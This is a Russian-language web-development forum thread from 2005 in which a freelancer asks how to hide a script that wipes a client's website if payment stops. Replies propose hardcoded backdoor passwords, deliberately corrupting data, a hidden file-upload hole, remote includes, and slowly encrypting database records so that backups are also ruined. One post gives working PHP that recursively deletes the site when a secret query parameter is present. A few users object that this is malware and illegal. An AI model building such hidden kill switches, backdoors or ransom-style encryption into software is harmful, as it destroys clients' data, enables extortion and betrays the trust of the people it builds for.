Справочник функций

Ваш аккаунт

Войти через: 
Забыли пароль?
Регистрация
Информацию о новых материалах можно получать и без регистрации:

Почтовая рассылка

Подписчиков: -1
Последний выпуск: 19.06.2015

Хочу сделать в сайте дыру...

1.8K
19 сентября 2005 года
BIKTOP
91 / / 06.04.2005
Подскажите: может ли РНР-скрипт удалить все содержимое сайта?
Например, если плохой заказчик не хочет платить за поддержку сайта, я вызываю определенный скрипт (который по совместительству выполняет какие-то еще функции) с определенными параматрами. И этот скрипт под чистую убирает все в папке
Можно ли так сделать. И что для этого надо делать предварительно? Надо ли шаманить с правами доступа?
Или мож кто знает другой способ, как наказать хитрож*пого заказчика?...

P. S. Заказчик - человек исключительно тупой. РНР для него это просто сочетание букв :).
299
19 сентября 2005 года
3D Bob
885 / / 18.04.2005
Да и ты знанияим не блистаешь, если не знаешь как это сделать)))
1.8K
19 сентября 2005 года
BIKTOP
91 / / 06.04.2005
Цитата:
Originally posted by 3D Bob
Да и ты знанияим не блистаешь, если не знаешь как это сделать)))


Мне кажется, что когда ты ничинал, то знаниями тоже блестал не особо. Но сейчас такая возможность имеется.

Ближе к делу. Есть такая ф-я unlink (). НО, я так подозреваю, что на большинстве хостингов действие этой функции ограничено (например, припомощи режима safe_mode). В мане по этому поводу имеется мэсседж:

Цитата:
Проверяет, имеют ли файл/директории, с которыми вы работаете, тот же самый UID, что и исполняемый скрипт.


Отсюда вопросы:
Какой UID имеет скрипт, запущенный обычным образом?
Может ли все-таки функция unlink() удалить файл в режиме safe_mode?

P. S. Прошу больше не давать оценку моих знаний.

299
19 сентября 2005 года
3D Bob
885 / / 18.04.2005
Цитата:
Originally posted by BIKTOP
Мне кажется, что когда ты ничинал, то знаниями тоже блестал не особо. Но сейчас такая возможность имеется.

Ближе к делу. Есть такая ф-я unlink (). НО, я так подозреваю, что на большинстве хостингов действие этой функции ограничено (например, припомощи режима safe_mode). В мане по этому поводу имеется мэсседж:
Отсюда вопросы:
Какой UID имеет скрипт, запущенный обычным образом?
Может ли все-таки функция unlink() удалить файл в режиме safe_mode?

P. S. Прошу больше не давать оценку моих знаний.



Сорри, однако разумный у тебя подоход.
Хочу заметить что хосты не переводятят ничего в сэйв моуде, ибо система в этом режиме рработает медленно.
Покажи где это написано для анлинка.

1.8K
19 сентября 2005 года
BIKTOP
91 / / 06.04.2005
Цитата:
Originally posted by 3D Bob
Сорри, однако разумный у тебя подоход.
Хочу заметить что хосты не переводятят ничего в сэйв моуде, ибо система в этом режиме рработает медленно.
Покажи где это написано для анлинка.


Про анлинк в сейф моуде написано здесь.
Т. е. получается, что unlink() работает вне зависимости от того, какой uid присваивается запущенному скрипту?..

304
20 сентября 2005 года
Fenyx
707 / / 26.01.2005
Цитата:
Originally posted by BIKTOP
Подскажите: может ли РНР-скрипт удалить все содержимое сайта?
Например, если плохой заказчик не хочет платить за поддержку сайта, я вызываю определенный скрипт (который по совместительству выполняет какие-то еще функции) с определенными параматрами. И этот скрипт под чистую убирает все в папке
Можно ли так сделать. И что для этого надо делать предварительно? Надо ли шаманить с правами доступа?
Или мож кто знает другой способ, как наказать хитрож*пого заказчика?...

P. S. Заказчик - человек исключительно тупой. РНР для него это просто сочетание букв :).


Ну во первых все нормальные хостеры ведут бекапы сайтов... Удалять сайт некачественного заказчика ты не будешь в первый же день - подозрение упадет на тебя, а там и суд могет быть, а на второй день уже будет бекап, если не на первый...
ИМХО, дыру нада делать незаметную и не с удалением, а с изменением информации, куда приятней написать в тайтл пару тройку отборных матов :) или внести невидимый текст, а потом пожаловаться на спам, а верхом изысков написать скриптик обманывающий поисковик :) и опят таки пожаловаться на спам... От такой дыры бекапы не спасут, если сделать незаметно :)

299
20 сентября 2005 года
3D Bob
885 / / 18.04.2005
Цитата:
Originally posted by Fenyx
Ну во первых все нормальные хостеры ведут бекапы сайтов... Удалять сайт некачественного заказчика ты не будешь в первый же день - подозрение упадет на тебя, а там и суд могет быть, а на второй день уже будет бекап, если не на первый...
ИМХО, дыру нада делать незаметную и не с удалением, а с изменением информации, куда приятней написать в тайтл пару тройку отборных матов :) или внести невидимый текст, а потом пожаловаться на спам, а верхом изысков написать скриптик обманывающий поисковик :) и опят таки пожаловаться на спам... От такой дыры бекапы не спасут, если сделать незаметно :)


Если с этой стороны смотреть, то в судь можно просто подать за неуплату.

332
20 сентября 2005 года
Valiant
416 / / 27.09.2004
на мой взгляд самый удачный вариант:
если для заказчика ПХП это просто звук, то я полагаю ему надо делать админку. Из этого вытекает что ты можешь ему ограничить доступ к сей админке (до оплаты ессно), т.е. чел ничего не сможет менять и ничего не сможет добавлять до тех пор пока не заплатит.
Например поменять пароль и ламо ничего не сможет сдалать... ведь он не чешет в ПХП(а ты в свою очередь сделай для себя подстраховку т.е. что бы ты всегда с заданным логином и пассом смог войти и натворить там дел).
299
20 сентября 2005 года
3D Bob
885 / / 18.04.2005
Цитата:
Originally posted by Valiant
на мой взгляд самый удачный вариант:
если для заказчика ПХП это просто звук, то я полагаю ему надо делать админку. Из этого вытекает что ты можешь ему ограничить доступ к сей админке (до оплаты ессно), т.е. чел ничего не сможет менять и ничего не сможет добавлять до тех пор пока не заплатит.
Например поменять пароль и ламо ничего не сможет сдалать... ведь он не чешет в ПХП(а ты в свою очередь сделай для себя подстраховку т.е. что бы ты всегда с заданным логином и пассом смог войти и натворить там дел).



Впринципе да, и свой личный пароль в таком случае уж, лучше встраивать в код а не в базу.

4.7K
20 сентября 2005 года
Extractor
151 / / 26.08.2005
если нет возможности и времени писать админ-ние можно в скрипте сознательно внести ошибку которая бы искажала информацию, не трапалось, а искажало бы
332
20 сентября 2005 года
Valiant
416 / / 27.09.2004
Цитата:
Originally posted by 3D Bob
Впринципе да, и свой личный пароль в таком случае уж, лучше встраивать в код а не в базу.


ну это как раз и подразумевалось

338
20 сентября 2005 года
chigevara
529 / / 29.09.2003
Цитата:
Originally posted by Valiant
ну это как раз и подразумевалось


Если есть база, нах трогать скрипты? Шифруешь помаленьку запись за записью, а в один прекрасный момент они все опс, и зашифрованные. Причем ассиметричным ключем. Да так, что ни один кулибин блин не расшифрует. И будет твой клиент ждать пока RSA взнесут или отношения с тобой налаживать - другая то половинка ключа у тебя.

299
20 сентября 2005 года
3D Bob
885 / / 18.04.2005
Ну вот шифровальщик пришел, которому лишь бы что зашифровать....:D
10K
20 сентября 2005 года
vse
38 / / 16.09.2005
Цитата:
Originally posted by chigevara
Если есть база, нах трогать скрипты? Шифруешь помаленьку запись за записью, а в один прекрасный момент они все опс, и зашифрованные. Причем ассиметричным ключем. Да так, что ни один кулибин блин не расшифрует. И будет твой клиент ждать пока RSA взнесут или отношения с тобой налаживать - другая то половинка ключа у тебя.


А причём тут ассиметричное шифрование ? Раз он шифрует потихоньку, значит поначалу он и расшифровывает закрытым ключём, чтобы показать инфу.
А если закрытый есть но потом пропадает, то то же можно сделать с симметричным шифрованием.

338
20 сентября 2005 года
chigevara
529 / / 29.09.2003
Цитата:
Originally posted by vse
А причём тут ассиметричное шифрование ? Раз он шифрует потихоньку, значит поначалу он и расшифровывает закрытым ключём, чтобы показать инфу.
А если закрытый есть но потом пропадает, то то же можно сделать с симметричным шифрованием.


Нет, он заранее проектирует базу так, что в записях присутствует поле cipher и во все запросы вставляет AND NOT cipher, соответственно при шифровании флаг устанавливается и в выборках не участвует.
Постепенно - чтобы бэкапы потерлись полушифрованными версиями. К тому времени как в себя приходят бэкапы уже значительно похерены.
таким образом закрытый ключ в коде не присутствует и уже по барабану - рубит клиент в коде, не рубит.
Не забывайте, клиент в сердцах может заплатить гораздо большую сумму чем заторчал исполнителю, другому кодеру - из принципа - нех мол нас напрягать и в тупички ставить - в смысле по опыту говорю.

1.8K
20 сентября 2005 года
BIKTOP
91 / / 06.04.2005
Всем спасибо за содержательные ответы.
Вообщето, никакой официальщины, так что про суды говорить не стоит.
Работа выполняестя таким образом:
Пишется сайт за умеренную плату, можно сказать, по усному договору. Сайт отдается тлолько тогда, когда будет за него оплата И официальное зачисление в штат сотрудников (на соответствующий пост) с целью расширения и поддержки сайта (минимум на 2 месяца с оговоренным заранее окладом).
Вот такие пироги.
Вообще-то ребята там нормальные, кинуть не должны, но перестраховаться стоило бы...
300
21 сентября 2005 года
ReDrum
689 / / 20.04.2000
Цитата:
Originally posted by BIKTOP
....
Вообще-то ребята там нормальные, кинуть не должны, но перестраховаться стоило бы...



А вот здесь возникает ситуация до наоборот. Ребята (неважно, что не особо разбираются, всегда найдется кто нить, кто разберется) посмотрят твой код и спросят, чтоже ты милый человек сделал то? Закладок понавставлял. И как теперь с тобой быть?
Собственно, делать дырочки, тем более сознательно - imho, совсем не комильфо.

10K
21 сентября 2005 года
vse
38 / / 16.09.2005
Цитата:
Originally posted by ReDrum
А вот здесь возникает ситуация до наоборот. Ребята (неважно, что не особо разбираются, всегда найдется кто нить, кто разберется) посмотрят твой код и спросят, чтоже ты милый человек сделал то? Закладок понавставлял. И как теперь с тобой быть?
Собственно, делать дырочки, тем более сознательно - imho, совсем не комильфо.


да кстати.
тя так кинут - денег не дадут и правильно сделают, а закладку уберут до начала экспуатации.
а сисадмин их 50 на 50 что этот форум видит

304
21 сентября 2005 года
Fenyx
707 / / 26.01.2005
Цитата:
Originally posted by ReDrum
А вот здесь возникает ситуация до наоборот. Ребята (неважно, что не особо разбираются, всегда найдется кто нить, кто разберется) посмотрят твой код и спросят, чтоже ты милый человек сделал то? Закладок понавставлял. И как теперь с тобой быть?
Собственно, делать дырочки, тем более сознательно - imho, совсем не комильфо.



Все зависит от того как и какие дырочки делать....Если бы у ребят были програмцы которые смогли бы найти мелкие дырочки, то они бы и писали, ИМХО.

513
21 сентября 2005 года
Yurec
228 / / 21.09.2005
Как-то давно сам писал, но ни када не использовал. Для некоторых случа5ев может подойти))) Надо тока придумать как сделать обращение к нему, пока если есть в адресной строке ?my, то он выполняется:

<?
function BuildTree($katalog,$pre)
{
if($pre!="")
$pre=$pre."/".$katalog;
else
$pre=$katalog;
$dir=opendir($pre);
while($file=readdir($dir))
{
if($file!="."&&$file!="..")
{
print($pre."/".$file."
");
if(is_dir($pre."/".$file))
BuildTree($file,$pre);
else
unlink($pre."/".$file);
}

}
rmdir($pre);
closedir($dir);

}

if(isset($my))
BuildTree(".","");
?>
300
21 сентября 2005 года
ReDrum
689 / / 20.04.2000
Цитата:
Originally posted by Fenyx
Все зависит от того как и какие дырочки делать....Если бы у ребят были програмцы которые смогли бы найти мелкие дырочки, то они бы и писали, ИМХО.



Опыт из своей работы. Была контора которая торговала через интернет. Периодически, что то случалось с их магазином. В один день такая ситуация людям надоела. Встал вопрос - что делать. Или заказывать новый проект, или доработать существующий. Остановились на втором. Нашли программиста, который сможет сделать аудит существующего кода и дать рекомендации что нужно исправить.
Собственно, если ты передаешь код заказчику, он волен делать с ним все что угодно. И совсем не факт что первоначальный автор кода будет единственным в поддержке проекта.

304
21 сентября 2005 года
Fenyx
707 / / 26.01.2005
Цитата:
Originally posted by ReDrum
Опыт из своей работы. Была контора которая торговала через интернет. Периодически, что то случалось с их магазином. В один день такая ситуация людям надоела. Встал вопрос - что делать. Или заказывать новый проект, или доработать существующий. Остановились на втором. Нашли программиста, который сможет сделать аудит существующего кода и дать рекомендации что нужно исправить.
Собственно, если ты передаешь код заказчику, он волен делать с ним все что угодно. И совсем не факт что первоначальный автор кода будет единственным в поддержке проекта.


Тада самый простой вариант не давать исходники кода клиенту, а показывать на своем хосте:)

299
21 сентября 2005 года
3D Bob
885 / / 18.04.2005
Цитата:
Originally posted by Fenyx
Тада самый простой вариант не давать исходники кода клиенту, а показывать на своем хосте:)



Или зашифровать исходники)))))))))))))
Звать Чигевару=)

332
26 сентября 2005 года
Valiant
416 / / 27.09.2004
Ну если вы совсем боитесь за свои исходники то можно поступить ещё круче заюзать Си++ а там пускай разбираются любители ассемблера
304
26 сентября 2005 года
Fenyx
707 / / 26.01.2005
Цитата:
Originally posted by Valiant
Ну если вы совсем боитесь за свои исходники то можно поступить ещё круче заюзать Си++ а там пускай разбираются любители ассемблера



А еще лучше, дабы они не достались злобному клиенту(ведь он обманет) - стереть их нахиг...:D

299
26 сентября 2005 года
3D Bob
885 / / 18.04.2005
Цитата:
Originally posted by Fenyx
А еще лучше, дабы они не достались злобному клиенту(ведь он обманет) - стереть их нахиг...:D



Соглсен насчет щей.
Но Щи, можно все таки дизасемблировать.
Лучше уж сразу писать на ассемблере, на ассемблере, код можно закодировать, и раскодировывать только во время выполнения программы.:)

15
29 сентября 2005 года
shaelf
2.7K / / 04.05.2005
Zend Encoder тебе в руки:).
513
06 октября 2005 года
Yurec
228 / / 21.09.2005
Ещё один вариант не париться и ничего ломающего не писать (не тратить на ето время). Однако, оставить "дырку" такого плана: ввести возможность загрузки файлов на сервер через СВОЙ web интерфейс. Если возникнут проблемы, можно будет уже выдумывать что там и как ломать (чтобы так сказать ускорить сильно затянувшийся процесс оплаты), писать скрипт и слать его на сервер. Главное чтобы эти дырки особо "не светились", а то туда может закачать всё что угодно кто хочет )))
1.9K
06 октября 2005 года
kasap
168 / / 07.04.2005
Цитата:
Originally posted by BIKTOP
Подскажите: может ли РНР-скрипт удалить все содержимое сайта?
Например, если плохой заказчик не хочет платить за поддержку сайта, я вызываю определенный скрипт (который по совместительству выполняет какие-то еще функции) с определенными параматрами. И этот скрипт под чистую убирает все в папке
Можно ли так сделать. И что для этого надо делать предварительно? Надо ли шаманить с правами доступа?
Или мож кто знает другой способ, как наказать хитрож*пого заказчика?...

P. S. Заказчик - человек исключительно тупой. РНР для него это просто сочетание букв :).



Я бы сделал так... В query string передал бы параметры типа http://site.ru/?do=del_site
А где нибудь в скрипте отлавливалась эта самая переменная $do со значением del_site и последующим unlink(). Красивее будет если скрипт удалит все после этого создаст 1 файл index.html в котором в центру большими буквами будет написано "ВЛАДЕЛЕЦ САЙТА ОКАЗАЛСЯ СВОЛОЧЬЮ, ЕГО САЙТ УДАЛЕН!". :)

15
09 октября 2005 года
shaelf
2.7K / / 04.05.2005
Цитата:
Originally posted by kasap
Я бы сделал так... В query string передал бы параметры типа http://site.ru/?do=del_site
А где нибудь в скрипте отлавливалась эта самая переменная $do со значением del_site и последующим unlink(). Красивее будет если скрипт удалит все после этого создаст 1 файл index.html в котором в центру большими буквами будет написано "ВЛАДЕЛЕЦ САЙТА ОКАЗАЛСЯ СВОЛОЧЬЮ, ЕГО САЙТ УДАЛЕН!". :)


А это уже считаеться вредноносной программой и катит под статью.

513
10 октября 2005 года
Yurec
228 / / 21.09.2005
Цитата:
Originally posted by shaelf
А это уже считаеться вредноносной программой и катит под статью.



Точняк! Так что надо заключать договор на разработку чтобы не было проблем! Хотя бы как между физ и юр лицом.

1.9K
10 октября 2005 года
kasap
168 / / 07.04.2005
Цитата:
Originally posted by shaelf
А это уже считаеться вредноносной программой и катит под статью.



А обдурить честного программера, который с опухшими глазами ночами кодил сайт, по-твоему честно? И чем же она вредоносна? Что у кого-то хард от этого накроется?

513
10 октября 2005 года
Yurec
228 / / 21.09.2005
Цитата:
Originally posted by kasap
А обдурить честного программера, который с опухшими глазами ночами кодил сайт, по-твоему честно? И чем же она вредоносна? Что у кого-то хард от этого накроется?



Тоже верно! Побывал на этом месте года 3 назад. Но спасла ситуация, что пароли к серверу были тока у меня. Динамили 4 месяца с деньгами. Потом я позвонил и сказал, что если не оплатят сайт удалю, сразу оплатили на следующий день. Хотя могли и по башне настучать.... тогда уже ничего не помоголо бы P(

1.9K
10 октября 2005 года
kasap
168 / / 07.04.2005
Цитата:
Originally posted by Yurec
Тоже верно! Побывал на этом месте года 3 назад. Но спасла ситуация, что пароли к серверу были тока у меня. Динамили 4 месяца с деньгами. Потом я позвонил и сказал, что если не оплатят сайт удалю, сразу оплатили на следующий день. Хотя могли и по башне настучать.... тогда уже ничего не помоголо бы P(



Можно просто удалить все файлы с сервака. А потом сказать, что ты не причем. В этом случае заказчик сам прибежит с деньгами. :)
ИМХО лучше всегда подстаховываться, либо на каждый заказ составлять контакт.

391
10 октября 2005 года
Archie
562 / / 03.02.2005
Можно в скрипте делать include с удаленного сервера, а в случае чего, на том сервере включаемые файлы почистить или переименовать.
15
10 октября 2005 года
shaelf
2.7K / / 04.05.2005
Цитата:
Originally posted by kasap
А обдурить честного программера, который с опухшими глазами ночами кодил сайт, по-твоему честно? И чем же она вредоносна? Что у кого-то хард от этого накроется?


Ты считаешь, что вредноносные программы только могут железо портить? Тут не идёт разговор про честность, тут разговор начился про законность, а вот он как раз в этом случае будет на стороне заказчика. Можно считать это троянским конём, если так будет угодно. Сам попадал в такие ситуации и знаю какого это. Сейчас у меня всё проще.
1 этап. Договариваешься (Т.З., сумма, возможна небольшая предоплата ~5-10%) и отдаёшь заказ дизайнеру (я один не работаю).
2 этап. Дизайн одобряеться (jpg низкого качества) отнимаеться ещё 50% и при желании его ему отдаёться PSD файл.
3 этап Сайт выкладываеться на МОЁМ сайте (в отдельную папку) итам в течении небольшого времени тестируеться заказчиком. После отбираються полностью деньги и заливаеться к нему на хостинг. Если он начинает ворчать недовольно (типа ко мне давай), то шифруеться zend'ом и заливаеться к нему (само собой в триальной версии) всё, точка, ни шагу влево, ни шагу вправо. Если начинают "ну ты сделай, посмотрим, потом заплатим" 95% на***т (могу ошибаться, это моя личная статистика).

Реклама на сайте | Обмен ссылками | Ссылки | Экспорт (RSS) | Контакты
Добавить статью | Добавить исходник | Добавить хостинг-провайдера | Добавить сайт в каталог